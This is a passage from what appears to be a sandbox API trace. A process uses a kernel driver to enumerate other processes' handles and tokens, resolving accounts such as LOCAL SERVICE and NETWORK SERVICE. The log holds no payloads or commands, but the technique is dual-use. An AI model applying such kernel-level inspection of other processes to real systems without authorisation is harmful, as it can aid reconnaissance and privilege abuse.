lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.278] PsLookupProcessByProcessId (in: ProcessId=0x1c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.278] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.278] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.278] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.279] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.279] PsLookupProcessByProcessId (in: ProcessId=0x1c4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.279] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.279] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x0 [0227.279] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.279] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.279] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.279] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.279] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.279] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.279] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.279] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.279] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.279] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.280] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.280] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.280] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.280] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.280] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.280] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.280] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.280] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.280] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.280] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.280] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.280] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.280] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.280] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.280] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.280] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.281] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.281] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.281] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.281] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.281] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.281] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0227.281] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0xc000000b [0227.281] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.281] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa74) returned 0xc8 [0227.281] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.281] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002345b30, HandleInformation=0x0) returned 0x0 [0227.281] ObOpenObjectByPointer (in: Object=0xfffffa8002345b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0227.281] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x24 [0227.281] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800240b4c0 | out: TokenHandle=0xfffffa800240b4c0*=0xc4) returned 0x0 [0227.282] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0227.282] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.282] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.282] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.284] CloseHandle (hObject=0xc4) returned 1 [0227.284] CloseHandle (hObject=0xc8) returned 1 [0227.284] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.284] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.284] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.285] PsAcquireProcessExitSynchronization () returned 0x0 [0227.285] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0) [0227.285] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80023a8670, HandleInformation=0x0) returned 0x0 [0227.285] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.285] PsReleaseProcessExitSynchronization () returned 0x2 [0227.285] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0227.285] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.285] ObfDereferenceObject (Object=0xfffffa80023a8670) returned 0x1 [0227.285] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.285] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.285] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.285] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0227.285] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.285] PsAcquireProcessExitSynchronization () returned 0x0 [0227.285] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0) [0227.286] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80024d3bb0, HandleInformation=0x0) returned 0x0 [0227.286] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.286] PsReleaseProcessExitSynchronization () returned 0x2 [0227.286] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0227.286] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.286] ObfDereferenceObject (Object=0xfffffa80024d3bb0) returned 0x1 [0227.286] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.286] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.286] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.286] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0227.286] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.286] PsAcquireProcessExitSynchronization () returned 0x0 [0227.286] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0) [0227.286] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800264ef20, HandleInformation=0x0) returned 0x0 [0227.286] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.286] PsReleaseProcessExitSynchronization () returned 0x2 [0227.287] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0227.287] ObQueryNameString (in: Object=0xfffffa800264ef20, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.287] ObfDereferenceObject (Object=0xfffffa800264ef20) returned 0x3 [0227.287] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.287] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.287] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.287] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0227.287] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.287] PsAcquireProcessExitSynchronization () returned 0x0 [0227.287] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880052b35d0) [0227.287] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800264eac0, HandleInformation=0x0) returned 0x0 [0227.287] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.287] PsReleaseProcessExitSynchronization () returned 0x2 [0227.287] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x22 [0227.287] ObQueryNameString (in: Object=0xfffffa800264eac0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.287] ObfDereferenceObject (Object=0xfffffa800264eac0) returned 0x3 [0227.287] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.288] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0xc8 [0227.288] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.288] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80026627f0, HandleInformation=0x0) returned 0x0 [0227.288] ObOpenObjectByPointer (in: Object=0xfffffa80026627f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0227.288] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x2a [0227.288] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa800240b4c0 | out: TokenHandle=0xfffffa800240b4c0*=0xc4) returned 0x0 [0227.288] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0227.288] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.288] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.288] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.290] CloseHandle (hObject=0xc4) returned 1 [0227.290] CloseHandle (hObject=0xc8) returned 1 [0227.290] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.290] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.290] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.290] PsAcquireProcessExitSynchronization () returned 0x0 [0227.290] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0) [0227.290] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002147c20, HandleInformation=0x0) returned 0x0 [0227.290] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.290] PsReleaseProcessExitSynchronization () returned 0x2 [0227.290] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0227.291] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.291] ObfDereferenceObject (Object=0xfffffa8002147c20) returned 0x1 [0227.291] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.291] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.291] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.291] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0227.291] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.291] PsAcquireProcessExitSynchronization () returned 0x0 [0227.291] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0) [0227.291] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80026a1be0, HandleInformation=0x0) returned 0x0 [0227.291] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.291] PsReleaseProcessExitSynchronization () returned 0x2 [0227.291] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0227.291] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.291] ObfDereferenceObject (Object=0xfffffa80026a1be0) returned 0x1 [0227.291] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.291] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.292] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.292] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0227.292] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.292] PsAcquireProcessExitSynchronization () returned 0x0 [0227.292] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0) [0227.292] ObReferenceObjectByHandle (in: Handle=0x148, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80030202f0, HandleInformation=0x0) returned 0x0 [0227.292] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.292] PsReleaseProcessExitSynchronization () returned 0x2 [0227.292] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0227.292] ObQueryNameString (in: Object=0xfffffa8002821590, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.292] ObfDereferenceObject (Object=0xfffffa80030202f0) returned 0x1 [0227.292] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.292] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.292] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.292] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.292] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.292] PsAcquireProcessExitSynchronization () returned 0x0 [0227.292] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0) [0227.292] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003022590, HandleInformation=0x0) returned 0x0 [0227.293] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.293] PsReleaseProcessExitSynchronization () returned 0x2 [0227.293] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0227.293] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.293] ObfDereferenceObject (Object=0xfffffa8003022590) returned 0x1 [0227.293] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.293] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.293] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.293] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0227.293] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.293] PsAcquireProcessExitSynchronization () returned 0x0 [0227.293] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880052b35d0) [0227.293] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80019da070, HandleInformation=0x0) returned 0x0 [0227.293] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.293] PsReleaseProcessExitSynchronization () returned 0x2 [0227.293] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x28 [0227.293] ObQueryNameString (in: Object=0xfffffa8002821590, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.293] ObfDereferenceObject (Object=0xfffffa80019da070) returned 0x3 [0227.293] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.293] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x80c) returned 0x0 [0227.293] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.293] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x364b20, lpBytesReturned=0x12d450, 